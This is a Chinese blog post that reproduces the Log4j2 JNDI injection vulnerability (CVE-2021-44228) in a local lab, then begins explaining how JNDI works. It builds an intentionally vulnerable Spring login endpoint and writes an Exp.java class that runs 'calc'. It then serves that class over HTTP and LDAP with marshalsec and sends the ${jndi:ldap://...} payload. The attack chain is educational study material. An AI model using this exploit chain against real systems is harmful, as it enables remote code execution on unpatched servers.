<!DOCTYPE HTML>
<html lang="zh-CN">


<head>
    <meta charset="utf-8">
    <meta name="keywords" content="漏洞复现,Log4j2,JNDI注入,CVE-2021-44228">
    <meta name="description" content="Log4j2的JNDI注入漏洞（CVE-2021-44228）可以称之为“核弹”级别。Log4j2作为类似jdk级别的基础类库，几乎无人幸免。">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no">
    <meta name="renderer" content="webkit|ie-stand|ie-comp">
    <meta name="mobile-web-app-capable" content="yes">
    <meta name="format-detection" content="telephone=no">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
    <meta name="referrer" content="no-referrer-when-downgrade">
    <!-- Global site tag (gtag.js) - Google Analytics -->


    <title>Log4j2（CVE-2021-44228）漏洞复现及原理思考 | wa0er</title>
    <link rel="icon" type="image/png" href="/wa0er.png">

    <link rel="stylesheet" type="text/css" href="/libs/awesome/css/all.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/materialize/materialize.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/aos/aos.css">
    <link rel="stylesheet" type="text/css" href="/libs/animate/animate.min.css">
    <link rel="stylesheet" type="text/css" href="/libs/lightGallery/css/lightgallery.min.css">
    <link rel="stylesheet" type="text/css" href="/css/matery.css">
    <link rel="stylesheet" type="text/css" href="/css/my.css">

    <script src="/libs/jquery/jquery-3.6.0.min.js"></script>

<meta name="generator" content="Hexo 6.0.0">
<style>.github-emoji { position: relative; display: inline-block; width: 1.2em; min-height: 1.2em; overflow: hidden; vertical-align: top; color: transparent; }  .github-emoji > span { position: relative; z-index: 10; }  .github-emoji img, .github-emoji .fancybox { margin: 0 !important; padding: 0 !important; border: none !important; outline: none !important; text-decoration: none !important; user-select: none !important; cursor: auto !important; }  .github-emoji img { height: 1.2em !important; width: 1.2em !important; position: absolute !important; left: 50% !important; top: 50% !important; transform: translate(-50%, -50%) !important; user-select: none !important; cursor: auto !important; } .github-emoji-fallback { color: inherit; } .github-emoji-fallback img { opacity: 0 !important; }</style>
<link rel="alternate" href="/atom.xml" title="wa0er" type="application/atom+xml">
</head>




<!-- 加载动画 -->


<body>
    <!-- 加载动画 -->
    

    <header class="navbar-fixed">
    <nav id="headNav" class="bg-color nav-transparent">
        <div id="navContainer" class="nav-wrapper container">
            <div class="brand-logo">
                <a href="/" class="waves-effect waves-light">
                    
                    <img src="/medias/wa0er.png" class="logo-img" alt="LOGO">
                    
                    <span class="logo-span">wa0er</span>
                </a>
            </div>
            

<a href="#" data-target="mobile-nav" class="sidenav-trigger button-collapse"><i class="fas fa-bars"></i></a>
<ul class="right nav-menu">
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/" class="waves-effect waves-light">
      
      <i class="fas fa-home" style="zoom: 0.6;"></i>
      
      <span>首页</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/tags" class="waves-effect waves-light">
      
      <i class="fas fa-tags" style="zoom: 0.6;"></i>
      
      <span>标签</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/categories" class="waves-effect waves-light">
      
      <i class="fas fa-bookmark" style="zoom: 0.6;"></i>
      
      <span>分类</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/archives" class="waves-effect waves-light">
      
      <i class="fas fa-archive" style="zoom: 0.6;"></i>
      
      <span>归档</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/about" class="waves-effect waves-light">
      
      <i class="fas fa-user-circle" style="zoom: 0.6;"></i>
      
      <span>关于</span>
    </a>
    
  </li>
  
  <li class="hide-on-med-and-down nav-item">
    
    <a href="/friends" class="waves-effect waves-light">
      
      <i class="fas fa-address-book" style="zoom: 0.6;"></i>
      
      <span>友情链接</span>
    </a>
    
  </li>
  
  <li>
    <a href="#searchModal" class="modal-trigger waves-effect waves-light">
      <i id="searchIcon" class="fas fa-search" title="搜索" style="zoom: 0.85;"></i>
    </a>
  </li>
</ul>


<div id="mobile-nav" class="side-nav sidenav">

    <div class="mobile-head bg-color">
        
        <img src="/medias/wa0er.png" class="logo-img circle responsive-img">
        
        <div class="logo-name">wa0er</div>
        <div class="logo-desc">
            
            Love and Share
            
        </div>
    </div>

    <ul class="menu-list mobile-menu-list">
        
        <li class="m-nav-item">
	  
		<a href="/" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-home"></i>
			
			首页
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/tags" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-tags"></i>
			
			标签
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/categories" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-bookmark"></i>
			
			分类
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/archives" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-archive"></i>
			
			归档
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/about" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-user-circle"></i>
			
			关于
		</a>
          
        </li>
        
        <li class="m-nav-item">
	  
		<a href="/friends" class="waves-effect waves-light">
			
			    <i class="fa-fw fas fa-address-book"></i>
			
			友情链接
		</a>
          
        </li>
        
        
        <li><div class="divider"></div></li>
        <li>
            <a href="https://github.com/wa0er" class="waves-effect waves-light" target="_blank">
                <i class="fab fa-github-square fa-fw"></i>Follow Me
            </a>
        </li>
        
    </ul>
</div>


        </div>

        
            <style>
    .nav-transparent .github-corner {
        display: none !important;
    }

    .github-corner {
        position: absolute;
        z-index: 10;
        top: 0;
        right: 0;
        border: 0;
        transform: scale(1.1);
    }

    .github-corner svg {
        color: #0f9d58;
        fill: #fff;
        height: 64px;
        width: 64px;
    }

    .github-corner:hover .octo-arm {
        animation: a 0.56s ease-in-out;
    }

    .github-corner .octo-arm {
        animation: none;
    }

    @keyframes a {
        0%,
        to {
            transform: rotate(0);
        }
        20%,
        60% {
            transform: rotate(-25deg);
        }
        40%,
        80% {
            transform: rotate(10deg);
        }
    }
</style>

<a href="https://github.com/wa0er" class="github-corner tooltipped hide-on-med-and-down" target="_blank"
   data-tooltip="Follow Me" data-position="left" data-delay="50">
    <svg viewBox="0 0 250 250" aria-hidden="true">
        <path d="M0,0 L115,115 L130,115 L142,142 L250,250 L250,0 Z"></path>
        <path d="M128.3,109.0 C113.8,99.7 119.0,89.6 119.0,89.6 C122.0,82.7 120.5,78.6 120.5,78.6 C119.2,72.0 123.4,76.3 123.4,76.3 C127.3,80.9 125.5,87.3 125.5,87.3 C122.9,97.6 130.6,101.9 134.4,103.2"
              fill="currentColor" style="transform-origin: 130px 106px;" class="octo-arm"></path>
        <path d="M115.0,115.0 C114.9,115.1 118.7,116.5 119.8,115.4 L133.7,101.6 C136.9,99.2 139.9,98.4 142.2,98.6 C133.8,88.0 127.5,74.4 143.8,58.0 C148.5,53.4 154.0,51.2 159.7,51.0 C160.3,49.4 163.2,43.6 171.4,40.1 C171.4,40.1 176.1,42.5 178.8,56.2 C183.1,58.6 187.2,61.8 190.9,65.4 C194.5,69.0 197.7,73.2 200.1,77.6 C213.8,80.2 216.3,84.9 216.3,84.9 C212.7,93.1 206.9,96.0 205.4,96.6 C205.1,102.4 203.0,107.8 198.3,112.5 C181.9,128.9 168.3,122.5 157.7,114.1 C157.9,116.9 156.7,120.9 152.7,124.9 L141.0,136.5 C139.8,137.7 141.6,141.9 141.8,141.8 Z"
              fill="currentColor" class="octo-body"></path>
    </svg>
</a>
        
    </nav>

</header>

    
<script src="/libs/cryptojs/crypto-js.min.js"></script>
<script>
    (function() {
        let pwd = '';
        if (pwd && pwd.length > 0) {
            if (pwd !== CryptoJS.SHA256(prompt('请输入访问本文章的密码')).toString(CryptoJS.enc.Hex)) {
                alert('密码错误，将返回主页！');
                location.href = '/';
            }
        }
    })();
</script>




<div class="bg-cover pd-header post-cover" style="background-image: url('/medias/cover.png')">
    <div class="container" style="right: 0px;left: 0px;">
        <div class="row">
            <div class="col s12 m12 l12">
                <div class="brand">
                    <h1 class="description center-align post-title">Log4j2（CVE-2021-44228）漏洞复现及原理思考</h1>
                </div>
            </div>
        </div>
    </div>
</div>




<main class="post-container content">

    
    <link rel="stylesheet" href="/libs/tocbot/tocbot.css">
<style>
    #articleContent h1::before,
    #articleContent h2::before,
    #articleContent h3::before,
    #articleContent h4::before,
    #articleContent h5::before,
    #articleContent h6::before {
        display: block;
        content: " ";
        height: 100px;
        margin-top: -100px;
        visibility: hidden;
    }

    #articleContent :focus {
        outline: none;
    }

    .toc-fixed {
        position: fixed;
        top: 64px;
    }

    .toc-widget {
        width: 345px;
        padding-left: 20px;
    }

    .toc-widget .toc-title {
        padding: 35px 0 15px 17px;
        font-size: 1.5rem;
        font-weight: bold;
        line-height: 1.5rem;
    }

    .toc-widget ol {
        padding: 0;
        list-style: none;
    }

    #toc-content {
        padding-bottom: 30px;
        overflow: auto;
    }

    #toc-content ol {
        padding-left: 10px;
    }

    #toc-content ol li {
        padding-left: 10px;
    }

    #toc-content .toc-link:hover {
        color: #42b983;
        font-weight: 700;
        text-decoration: underline;
    }

    #toc-content .toc-link::before {
        background-color: transparent;
        max-height: 25px;

        position: absolute;
        right: 23.5vw;
        display: block;
    }

    #toc-content .is-active-link {
        color: #42b983;
    }

    #floating-toc-btn {
        position: fixed;
        right: 15px;
        bottom: 76px;
        padding-top: 15px;
        margin-bottom: 0;
        z-index: 998;
    }

    #floating-toc-btn .btn-floating {
        width: 48px;
        height: 48px;
    }

    #floating-toc-btn .btn-floating i {
        line-height: 48px;
        font-size: 1.4rem;
    }
</style>
<div class="row">
    <div id="main-content" class="col s12 m12 l9">
        <!-- 文章内容详情 -->
<div id="artDetail">
    <div class="card">
        <div class="card-content article-info">
            <div class="row tag-cate">
                <div class="col s7">
                    
                    <div class="article-tag">
                        
                            <a href="/tags/Log4j2/">
                                <span class="chip bg-color">Log4j2</span>
                            </a>
                        
                            <a href="/tags/JNDI%E6%B3%A8%E5%85%A5/">
                                <span class="chip bg-color">JNDI注入</span>
                            </a>
                        
                            <a href="/tags/CVE-2021-44228%EF%BC%88Log4j2%EF%BC%89/">
                                <span class="chip bg-color">CVE-2021-44228（Log4j2）</span>
                            </a>
                        
                    </div>
                    
                </div>
                <div class="col s5 right-align">
                    
                    <div class="post-cate">
                        <i class="fas fa-bookmark fa-fw icon-category"></i>
                        
                            <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" class="post-category">
                                漏洞复现
                            </a>
                        
                            <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/%E7%BB%86%E8%AF%BB%E7%BB%8F%E5%85%B8/" class="post-category">
                                细读经典
                            </a>
                        
                    </div>
                    
                </div>
            </div>

            <div class="post-info">
                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-minus fa-fw"></i>发布日期:&nbsp;&nbsp;
                    2023-10-21
                </div>
                

                
                <div class="post-date info-break-policy">
                    <i class="far fa-calendar-check fa-fw"></i>更新日期:&nbsp;&nbsp;
                    2023-11-27
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-file-word fa-fw"></i>文章字数:&nbsp;&nbsp;
                    3.8k&nbsp;字
                </div>
                

                
                <div class="info-break-policy">
                    <i class="far fa-clock fa-fw"></i>阅读时长:&nbsp;&nbsp;
                    15 分
                </div>
                

                
                    <div id="busuanzi_container_page_pv" class="info-break-policy">
                        <i class="far fa-eye fa-fw"></i>阅读次数:&nbsp;&nbsp;
                        <span id="busuanzi_value_page_pv"></span>&nbsp;次
                    </div>
				
            </div>
        </div>
        <hr class="clearfix">

        
        <!-- 是否加载使用自带的 prismjs. -->
        <link rel="stylesheet" href="/libs/prism/prism.css">
        

        
        <!-- 代码块折行 -->
        <style type="text/css">
            code[class*="language-"], pre[class*="language-"] { white-space: pre-wrap !important; }
        </style>
        

        <div class="card-content article-card-content">
            <div id="articleContent">
                <h1 id="Log4j2（CVE-2021-44228）漏洞复现及原理思考"><a href="#Log4j2（CVE-2021-44228）漏洞复现及原理思考" class="headerlink" title="Log4j2（CVE-2021-44228）漏洞复现及原理思考"></a>Log4j2（CVE-2021-44228）漏洞复现及原理思考</h1><h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>Log4j2是一个Java日志组件，被各类Java框架广泛地使用。它的前身是Log4j，Log4j2重新构建和设计了框架，可以认为两者是完全独立的两个日志组件。本次漏洞影响范围为Log4j2最早期的版本2.0-beta9到2.15.0。</p>
<p>因为存在前身Log4j，而且都是Apache下的项目，不管是jar包名称还是package名称，看起来都很相似，导致有些人分不清自己用的是Log4j还是Log4j2。这里给出几个辨别方法：</p>
<ol>
<li>Log4j2分为2个jar包，一个是接口<code>log4j-api-${版本号}.jar</code>，一个是具体实现<code>log4j-core-${版本号}.jar</code>。Log4j只有一个jar包<code>log4j-${版本号}.jar</code>。</li>
<li>Log4j2的版本号目前均为2.x。Log4j的版本号均为1.x。</li>
<li>Log4j2的package名称前缀为<code>org.apache.logging.log4j</code>。Log4j的package名称前缀为<code>org.apache.log4j</code>。</li>
</ol>
<p>Log4j2的JNDI注入漏洞（CVE-2021-44228）可以称之为“核弹”级别。Log4j2作为类似jdk级别的基础类库，几乎无人幸免。</p>
<h2 id="一、漏洞复现"><a href="#一、漏洞复现" class="headerlink" title="一、漏洞复现"></a>一、漏洞复现</h2><h3 id="（一）服务端环境搭建"><a href="#（一）服务端环境搭建" class="headerlink" title="（一）服务端环境搭建"></a>（一）服务端环境搭建</h3><p>开发环境：IDEA 2021.2、JDK 8</p>
<p>新建一个Spring项目，<code>File</code>→<code>New</code>→<code>Project</code>，配置如下</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908090322543.png" style="zoom: 80%;">

<p>勾选Spring Web</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908090553268.png" style="zoom:80%;">

<p>如果第一次创建，需稍等片刻下载spring-boot相关依赖，IDEA右下角可查看相关依赖下载进度。</p>
<p>修改pom.xml文件</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908091549004.png" style="zoom:80%;">

<p>添加如下代码</p>
<pre class="line-numbers language-xml" data-language="xml"><code class="language-xml"><span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>dependency</span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>groupId</span><span class="token punctuation">&gt;</span></span>org.apache.logging.log4j<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>groupId</span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>artifactId</span><span class="token punctuation">&gt;</span></span>log4j-core<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>artifactId</span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>version</span><span class="token punctuation">&gt;</span></span>2.8.1<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>version</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>dependency</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>dependency</span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>groupId</span><span class="token punctuation">&gt;</span></span>org.apache.logging.log4j<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>groupId</span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>artifactId</span><span class="token punctuation">&gt;</span></span>log4j-api<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>artifactId</span><span class="token punctuation">&gt;</span></span>
    <span class="token tag"><span class="token tag"><span class="token punctuation">&lt;</span>version</span><span class="token punctuation">&gt;</span></span>2.8.1<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>version</span><span class="token punctuation">&gt;</span></span>
<span class="token tag"><span class="token tag"><span class="token punctuation">&lt;/</span>dependency</span><span class="token punctuation">&gt;</span></span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908091247246.png" style="zoom:80%;">

<p>在<code>log4j_demo\src\main\java\com\example\log4j_demo</code>下创建<code>HelloLog4j.java</code>，内容如下</p>
<pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token keyword">package</span> <span class="token namespace">com<span class="token punctuation">.</span>example<span class="token punctuation">.</span>log4j_demo</span><span class="token punctuation">;</span>

<span class="token keyword">import</span> <span class="token namespace">org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>logging<span class="token punctuation">.</span>log4j<span class="token punctuation">.</span></span><span class="token class-name">LogManager</span><span class="token punctuation">;</span>
<span class="token keyword">import</span> <span class="token namespace">org<span class="token punctuation">.</span>apache<span class="token punctuation">.</span>logging<span class="token punctuation">.</span>log4j<span class="token punctuation">.</span></span><span class="token class-name">Logger</span><span class="token punctuation">;</span>
<span class="token keyword">import</span> <span class="token namespace">org<span class="token punctuation">.</span>springframework<span class="token punctuation">.</span>web<span class="token punctuation">.</span>bind<span class="token punctuation">.</span>annotation<span class="token punctuation">.</span></span><span class="token class-name">RequestBody</span><span class="token punctuation">;</span>
<span class="token keyword">import</span> <span class="token namespace">org<span class="token punctuation">.</span>springframework<span class="token punctuation">.</span>web<span class="token punctuation">.</span>bind<span class="token punctuation">.</span>annotation<span class="token punctuation">.</span></span><span class="token class-name">RequestMapping</span><span class="token punctuation">;</span>
<span class="token keyword">import</span> <span class="token namespace">org<span class="token punctuation">.</span>springframework<span class="token punctuation">.</span>web<span class="token punctuation">.</span>bind<span class="token punctuation">.</span>annotation<span class="token punctuation">.</span></span><span class="token class-name">RequestMethod</span><span class="token punctuation">;</span>
<span class="token keyword">import</span> <span class="token namespace">org<span class="token punctuation">.</span>springframework<span class="token punctuation">.</span>web<span class="token punctuation">.</span>bind<span class="token punctuation">.</span>annotation<span class="token punctuation">.</span></span><span class="token class-name">RestController</span><span class="token punctuation">;</span>

<span class="token keyword">import</span> <span class="token namespace">java<span class="token punctuation">.</span>util<span class="token punctuation">.</span></span><span class="token class-name">Map</span><span class="token punctuation">;</span>

<span class="token annotation punctuation">@RestController</span>
<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">HelloLog4j</span> <span class="token punctuation">{</span>

    <span class="token keyword">private</span> <span class="token class-name">Logger</span>  <span class="token class-name">Logger</span> <span class="token operator">=</span> <span class="token class-name">LogManager</span><span class="token punctuation">.</span><span class="token function">getLogger</span><span class="token punctuation">(</span><span class="token class-name">HelloLog4j</span><span class="token punctuation">.</span><span class="token keyword">class</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

    <span class="token annotation punctuation">@RequestMapping</span><span class="token punctuation">(</span>value <span class="token operator">=</span> <span class="token string">"/login"</span> <span class="token punctuation">,</span> method <span class="token operator">=</span> <span class="token punctuation">{</span><span class="token class-name">RequestMethod</span><span class="token punctuation">.</span>POST<span class="token punctuation">}</span><span class="token punctuation">)</span>
    <span class="token keyword">public</span> <span class="token class-name">String</span> <span class="token function">login</span><span class="token punctuation">(</span><span class="token annotation punctuation">@RequestBody</span> <span class="token class-name">Map</span> body<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token class-name">String</span> user <span class="token operator">=</span> body<span class="token punctuation">.</span><span class="token function">get</span><span class="token punctuation">(</span><span class="token string">"user"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token class-name">String</span> password <span class="token operator">=</span> body<span class="token punctuation">.</span><span class="token function">get</span><span class="token punctuation">(</span><span class="token string">"password"</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

        <span class="token class-name">Logger</span><span class="token punctuation">.</span><span class="token function">error</span><span class="token punctuation">(</span><span class="token string">"user:{}, password:{}"</span> <span class="token punctuation">,</span> user <span class="token punctuation">,</span>password<span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token string">"login"</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>IDEA右上角选择<code>Log4jDemoApplication</code>→<code>Edit Configurations</code>，弹窗修改<code>Environment</code>→<code>VM options</code></p>
<pre class="line-numbers language-none"><code class="language-none">-Dcom.sun.jndi.ldap.object.trustURLCodebase=true<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908092430183.png" style="zoom:80%;">

<p>然后需要检查几个地方</p>
<h4 id="1-JDK版本相关"><a href="#1-JDK版本相关" class="headerlink" title="1. JDK版本相关"></a><strong>1. JDK版本相关</strong></h4><p>可能出现的报错，参考：<a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_44299027/article/details/120848738">【Java异常】IDEA 报错：无效的目标发行版：17 </a></p>
<p><code>pom.xml</code>文件中的<code>java.version</code>属性需为8</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908093501751.png" style="zoom:80%;">

<p><code>File</code>→<code>Project Structure</code>→<code>Project</code>，SDK版本如下</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908094641643.png" style="zoom:80%;">

<p><code>File</code>→<code>Project Structure</code>→<code>Modules</code>，Language level如下</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908094857411.png" style="zoom:80%;">

<p><code>Settings</code>→<code>Java Compiler</code>如下</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908100158994.png" style="zoom:80%;">

<h4 id="2-SprinBoot版本相关"><a href="#2-SprinBoot版本相关" class="headerlink" title="2. SprinBoot版本相关"></a><strong>2. SprinBoot版本相关</strong></h4><p>可能出现的报错，参考：<a target="_blank" rel="noopener" href="https://zhuanlan.zhihu.com/p/615816253">类文件具有错误的版本 61.0, 应为 52.0</a></p>
<p><code>pom.xml</code>文件中spring-boot版本</p>
<p>因为Spring官方发布从Spring 6以及SprinBoot 3.0开始最低支持JDK 17，此处用的JDK 8，所以需将SpringBoot版本降低为3.0以下，笔者此处用2.7.8。</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908100822489.png" style="zoom:80%;">

<p>上面检查好后，右上角绿色小三角运行项目，控制台输出如下</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908131454392.png"></p>
<p>浏览器访问：<a target="_blank" rel="noopener" href="http://127.0.0.1:8080/login%EF%BC%8C%E9%94%99%E8%AF%AF%E9%A1%B5%E9%9D%A2%E6%98%AF%E5%9B%A0%E4%B8%BA%E4%BB%A3%E7%A0%81%E4%B8%AD%E5%8F%AA%E6%8E%A5%E6%94%B6POST%E8%AF%B7%E6%B1%82%EF%BC%8C%E4%B8%8D%E5%BD%B1%E5%93%8D">http://127.0.0.1:8080/login，错误页面是因为代码中只接收POST请求，不影响</a></p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908102318581.png" style="zoom:80%;">

<h3 id="（二）编写EXP"><a href="#（二）编写EXP" class="headerlink" title="（二）编写EXP"></a>（二）编写EXP</h3><p>新建一个Java项目，<code>File</code>→<code>New</code>→<code>Project</code></p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908102734860.png" style="zoom:80%;">

<p>然后直接Next→Next→起个项目名<code>Exp</code>→Finish</p>
<p>在src目录新建一个<code>Exp.java</code>，内容如下</p>
<pre class="line-numbers language-java" data-language="java"><code class="language-java"><span class="token keyword">import</span> <span class="token namespace">java<span class="token punctuation">.</span>io<span class="token punctuation">.</span></span><span class="token class-name">IOException</span><span class="token punctuation">;</span>

<span class="token keyword">public</span> <span class="token keyword">class</span> <span class="token class-name">Exp</span> <span class="token punctuation">{</span>
    <span class="token keyword">public</span> <span class="token class-name">Exp</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">{</span>
        <span class="token keyword">try</span> <span class="token punctuation">{</span>
            <span class="token class-name">Runtime</span><span class="token punctuation">.</span><span class="token function">getRuntime</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">exec</span><span class="token punctuation">(</span><span class="token string">"calc"</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span> <span class="token keyword">catch</span> <span class="token punctuation">(</span><span class="token class-name">IOException</span> e<span class="token punctuation">)</span> <span class="token punctuation">{</span>
            e<span class="token punctuation">.</span><span class="token function">printStackTrace</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token punctuation">}</span>
    <span class="token punctuation">}</span>

    <span class="token keyword">public</span> <span class="token keyword">static</span> <span class="token keyword">void</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token class-name">String</span><span class="token punctuation">[</span><span class="token punctuation">]</span> args<span class="token punctuation">)</span> <span class="token punctuation">{</span>
        <span class="token class-name">Exp</span> exploit <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Exp</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token punctuation">}</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>右键运行，可看到计算器被打开，且项目目录<code>Exp\out\production\Exp</code>下生成了<code>Exp.class</code></p>
<p>在此目录打开cmd，开一个http服务</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908104429604.png"></p>
<p>然后利用反序列化工具<code>marshalsec</code>，开一个LDAP服务</p>
<p>下载：<a target="_blank" rel="noopener" href="https://github.com/mbechler/marshalsec">https://github.com/mbechler/marshalsec</a></p>
<p>参考：<a target="_blank" rel="noopener" href="https://exploit-notes.hdks.org/exploit/web/log4j-pentesting/#exploit-apache-solr-(jndi)">https://exploit-notes.hdks.org/exploit/web/log4j-pentesting/#exploit-apache-solr-(jndi)</a></p>
<p>下载marshalsec，进到主目录，用如下命令编译</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">mvn clean package -DskipTests<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>编译成功cmd窗口末尾会显示如下内容</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908111918530.png"></p>
<p>然后开启LDAP服务</p>
<pre class="line-numbers language-shell" data-language="shell"><code class="language-shell">java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:9898/#Exp"<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908112631128.png"></p>
<p>通过HackBar用POST请求发送json格式payload如下，执行后，会弹出系统计算机</p>
<pre class="line-numbers language-json" data-language="json"><code class="language-json"><span class="token punctuation">{</span>
	<span class="token property">"user"</span><span class="token operator">:</span> <span class="token string">"wa0er"</span><span class="token punctuation">,</span>
	<span class="token property">"password"</span><span class="token operator">:</span> <span class="token string">"${jndi:ldap://127.0.0.1:1389/Exp}"</span>
<span class="token punctuation">}</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908113116419.png"></p>
<p>此时看LDAP和HTTP服务窗口如下，<code>Exp.class</code>被调用执行</p>
<p><img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20230908113454423.png"></p>
<p>复现成功！</p>
<h2 id="二、原理分析"><a href="#二、原理分析" class="headerlink" title="二、原理分析"></a>二、原理分析</h2><h3 id="（一）JNDI注入"><a href="#（一）JNDI注入" class="headerlink" title="（一）JNDI注入"></a>（一）JNDI注入</h3><p>参考：<a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/12277#toc-2">https://xz.aliyun.com/t/12277#toc-2</a></p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1611/#toc_jndi">https://tttang.com/archive/1611/#toc_jndi</a></p>
<p>JNDI(Java Naming and Directory Interface)是一个应用程序设计的 API，一种标准的 Java 命名系统接口。若程序定义了 JDNI 中的接口 API ，则就可以通过该接口 API 访问系统的 <code>命令服务</code>和<code>目录服务</code>，如下图。JNDI可访问的现有的目录及服务有:<code>JDBC</code>、<code>LDAP</code>、<code>RMI</code>、<code>DNS</code>、<code>NIS</code>、<code>CORBA</code>。</p>
<img src="https://img-1310220602.cos.ap-shanghai.myqcloud.com/image-20231020153635388.png" style="zoom: 67%;">

